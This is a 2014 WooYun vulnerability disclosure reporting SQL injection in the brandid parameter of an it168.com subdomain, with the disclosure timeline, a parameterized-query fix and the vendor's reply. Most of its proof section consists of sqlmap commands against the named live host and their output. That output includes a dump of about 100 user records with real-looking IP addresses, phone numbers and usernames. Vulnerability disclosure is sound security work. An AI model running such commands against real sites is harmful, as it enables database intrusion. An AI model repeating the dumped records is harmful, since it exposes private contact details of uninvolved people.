当前位置:WooYun >> 漏洞信息

漏洞概要 关注数(24) 关注此漏洞

缺陷编号:wooyun-2014-078562

漏洞标题:it168分站存在SQL注入漏洞

相关厂商:IT168.com

漏洞作者: Eoh

提交时间:2014-10-07 17:21

修复时间:2014-11-21 17:22

公开时间:2014-11-21 17:22

漏洞类型:SQL注射漏洞

危害等级:高

自评Rank:20

漏洞状态:厂商已经确认

漏洞来源: http://www.wooyun.org,如有疑问或需要帮助请联系 [email protected]

Tags标签:

4人收藏 收藏
分享漏洞:

漏洞详情

披露状态:

2014-10-07: 细节已通知厂商并且等待厂商处理中
2014-10-09: 厂商已经确认,细节仅向厂商公开
2014-10-19: 细节向核心白帽子及相关领域专家公开
2014-10-29: 细节向普通白帽子公开
2014-11-08: 细节向实习白帽子公开
2014-11-21: 细节向公众公开

简要描述:

未对用户输入正确执行危险字符清理

详细说明:

存在注入参数brandid
python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --banner

web application technology: PHP 5.5.5, Nginx
back-end DBMS: MySQL >= 5.0.0
banner:    '5.1.50-log'

漏洞证明:

python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 --dbs
available databases [38]:
[*] ad
[*] aix
[*] bsd
[*] che
[*] comment
[*] count
[*] cu_download
[*] cu_job
[*] cu_jobs
[*] cublog
[*] cucms
[*] db_book
[*] db_edu
[*] db_print
[*] db_product
[*] db_salon
[*] db_techlink
[*] db_youxidian
[*] diaocha
[*] doc
[*] ebookmail
[*] gongho
[*] help
[*] hi
[*] information_schema
[*] ittimes
[*] ittimes2
[*] linuxpublish
[*] mysql
[*] newspub
[*] test
[*] tushu
[*] uc_gbk
[*] vote
[*] vote2
[*] wiki
[*] wiki_utf8
[*] wotuiwole


python sqlmap.py -u "http://hctools.it168.com/submit.php?action=get_brand_print&brandid=*" --dbms=mysql --time-sec=2 -D diaocha -T it168_2009 -C id,ip,phone,username --start=1 --stop=100 --dump
取前100条数据
Database: diaocha
Table: it168_2009
[100 entries]
+-----+-----------------+----------------------------+----------------------------------------------------------+
| id  | ip              | phone                      | username                                                 |
+-----+-----------------+----------------------------+----------------------------------------------------------+
| 64  | 202.108.130.138 | 13810759208                | dearcelina                                               |
| 63  | 222.175.109.50  | 13910182143                | badboyokokok                                             |
| 62  | 210.51.173.169  | 58022266\\u00a3\\u00ad589  | fire9                                                    |
| 7   | 123.103.43.232  | 13466592878                | dzb_01                                                   |
| 8   | 124.64.72.238   | 13811703481                | kid.xiyang                                               |
| 9   | 123.124.198.195 | 64242299                   | duxuetao                                                 |
| 10  | 125.33.130.146  | 13910301945                | eveson                                                   |
| 11  | 125.33.130.146  | 13811810491                | shilihua                                                 |
| 12  | 203.187.191.167 | 13466379758                | agen_0502                                                |
| 13  | 202.99.23.184   | 010-65368391\\/15810566366 | TerryGong                                                |
| 14  | 202.99.23.184   | 010-65368389\\/13910325421 | mrrun                                                    |
| 15  | 221.221.218.251 | 13260003537                | guangzidao                                               |
| 16  | 125.34.208.136  | 13911463824                | \\u00bd\\u00a3\\u00b4\\u00ce\\u00c0\\u00c7               |
| 17  | 211.99.216.18   | 150001383472               | yudi2006                                                 |
| 18  | 211.155.253.89  | 15011051647                | zhangjunyi                                               |
| 19  | 211.103.237.35  | 15011424628                | cst05001                                                 |
| 20  | 123.112.82.106  | 13910116314                | polokus                                                  |
| 21  | 218.240.131.114 | 15811055822                | Seker                                                    |
| 22  | 211.99.216.18   | 84562121-1055              | lktpd                                                    |
| 23  | 222.134.206.253 | 13506346064                | zhaoxian                                                 |
| 24  | 222.134.206.253 | 010-62083613               | fadianjizu                                               |
| 25  | 202.108.145.77  | 13621108444                | ziggler                                                  |
| 26  | 124.192.11.35   | 010-65339328               | jerrywjl                                                 |
| 27  | 219.237.194.111 | 13810436018                | opbsder                                                  |
| 28  | 202.106.68.98   | 13466641423                | Ksharp                                                   |
| 29  | 124.42.101.210  | 13269651468                | senir                                                    |
| 30  | 61.172.241.98   | 13816778816                | crazymeny                                                |
| 31  | 211.99.216.18   | 13910402240                | sleepycat                                                |
| 32  | 124.42.101.210  | 13488867086                | firefly.jiang                                            |
| 33  | 125.69.110.149  | 13540418960                | yellowking                                               |
| 34  | 123.112.113.91  | 13381221392                | freet15                                                  |
| 35  | 219.143.44.130  | 15010248504                | gyl4802959                                               |
| 36  | 222.128.23.6    | 15810729060                | a1my                                                     |
| 37  | 219.143.47.18   | 13401001191                | arcow                                                    |
| 38  | 221.218.164.211 | 13911152920                | \\u00c5\\u00d6\\u00f3\\u00ac\\u00f3\\u00b0               |
| 39  | 211.88.30.160   | 15811195112                | \\u00b9\\u00ab\\u00d7\\u00d3Q                            |
| 40  | 123.122.101.150 | 15810815043                | shenmue71                                                |
| 41  | 202.108.39.249  | 13570214027                | \\u00ce\\u00de\\u00c9\\u00f9\\u00ce\\u00de\\u00cf\\u00a2 |
| 42  | 222.128.23.6    | 13810832224                | tingfengmanbu                                            |
| 43  | 202.108.39.249  | 02085106238                | hotsnow                                                  |
| 44  | 202.91.179.43   | 13439954909                | davidhan2009                                             |
| 45  | 124.193.83.30   | 13521512328                | hyran                                                    |
| 46  | 61.135.165.11   | 01063001300                | \\u00ca\\u00af\\u00d5\\u00b9                             |
| 47  | 124.205.77.176  | 13661240387                | cindylzh                                                 |
| 48  | 61.135.165.12   | 15010133354                | hdksky                                                   |
| 49  | 211.99.20.6     | 13811431506                | spihiker                                                 |
| 50  | 202.106.94.136  | 13720056292                | xiegang112                                               |
| 51  | 210.77.2.98     | 13141322077                | tyc611                                                   |
| 52  | 123.112.228.164 | 010-63480456               | chuhongze                                                |
| 53  | 125.34.142.230  | 13911310157                | changchun_li                                             |
| 54  | 123.127.220.10  | 13426219387                | aero                                                     |
| 55  | 124.205.77.23   | 13426342308                | fashionstyle                                             |
| 56  | 122.200.74.162  | 13520239976                | chaucerliu                                               |
| 57  | 202.108.145.11  | 13810929417                | songyupo                                                 |
| 58  | 211.155.253.89  | 13910018687                | hlglty                                                   |
| 59  | 211.155.253.89  | 13811050141                | bithuan                                                  |
| 60  | 218.249.43.227  | 15901232259                | craneflyfly                                              |
| 61  | 218.19.0.29     | 13005150787                | mamalove                                                 |
| 65  | 124.193.150.98  | 88027749-8091              | ly_cyz                                                   |
| 66  | 211.103.249.4   | 13718227935                | 271329410                                                |
| 67  | 211.103.249.4   | 13141370583                | qingyangs                                                |
| 68  | 218.249.49.194  | 01063182771                | wwj11998                                                 |
| 69  | 221.222.145.82  | 13488675472                | human.gold                                               |
| 70  | 59.151.54.34    | 58325249                   | redhat.zhou                                              |
| 71  | 211.157.5.116   | 58325260                   | maxcl                                                    |
| 72  | 59.108.42.241   | 010-84105839               | zouyi2005                                                |
| 73  | 61.135.159.228  | 13810689432                | h_xin8211                                                |
| 74  | 219.237.242.160 | 13269997344                | xiaoqi8866                                               |
| 75  | 218.240.136.221 | 15811015463                | tljwcm                                                   |
| 76  | 218.240.136.221 | 58834046                   | alexsun72                                                |
| 77  | 123.118.119.10  | 15910647819                | niangao1005                                              |
| 78  | 202.8.27.5      | 13910627963                | wshun                                                    |
| 79  | 218.247.142.203 | 62135687-866               | cah                                                      |
| 80  | 203.86.84.36    | 13520902241                | \\u00c7\\u00e5\\u00b3\\u00bf\\u00b9\\u00e2               |
| 81  | 211.151.88.39   | 15801465152                | llfxt                                                    |
| 82  | 221.221.22.162  | 13264294906                | superlifebuoy                                            |
| 83  | 60.28.240.69    | 13581731367                | dlx1986                                                  |
| 84  | 219.239.107.2   | 88196725                   | gust                                                     |
| 85  | 58.207.156.10   | 13810625240                | litaopier                                                |
| 86  | 221.221.22.162  | 13810969780                | \\u00b4\\u00ba\\u00c8\\u00a5\\u00c7\\u00ef\\u00c0\\u00b4 |
| 87  | 219.224.99.205  | 13811450340                | yanaiming                                                |
| 88  | 210.76.108.158  | 13426332010                | qiaobinbin                                               |
| 89  | 124.205.77.104  | 15910685356                | billzhou                                                 |
| 90  | 58.83.131.8     | 13393362792                | forward51                                                |
| 91  | 60.30.68.151    | 022-63981890               | race                                                     |
| 92  | 58.83.131.8     | 13393362792                | forward52                                                |
| 93  | 58.31.141.23    | 15810293009                | pc0326                                                   |
| 94  | 58.83.131.4     | 13811934236                | dongchun123                                              |
| 95  | 124.200.56.57   | 13601216657                | qinershi                                                 |
| 96  | 211.69.198.196  | 15171459982                | dawdo                                                    |
| 97  | 60.10.82.82     | 13910909137                | zhylyq                                                   |
| 98  | 124.64.106.88   | 13811920823                | yj11                                                     |
| 99  | 123.112.77.47   | (8610)88432858-8252        | liurunfeng                                               |
| 100 | 124.42.72.18    | 13911319742                | \\u00be\\u00b8\\u00bf\\u00b5                             |
| 101 | 119.143.128.112 | 13372520776                | single_element                                           |
| 102 | 125.96.85.194   | 62792944-222               | youngcow                                                 |
| 103 | 124.126.86.40   | 13911506054                | cnhtml                                                   |
| 104 | 202.108.130.138 | 13651083526                | winice                                                   |
| 105 | 119.254.240.146 | 13910114233                | RAULNAN                                                  |
| 106 | 218.240.2.98    | 13811088383                | xjc2694                                                  |
+-----+-----------------+----------------------------+----------------------------------------------------------+

修复方案:

参数化SQL语句

版权声明:转载请注明来源 Eoh@乌云

漏洞回应

厂商回应:

危害等级:低

漏洞Rank:1

确认时间:2014-10-09 10:28

厂商回复:

已终止的业务,内部沟通问题未停止指向,多谢帮助。

最新状态:

暂无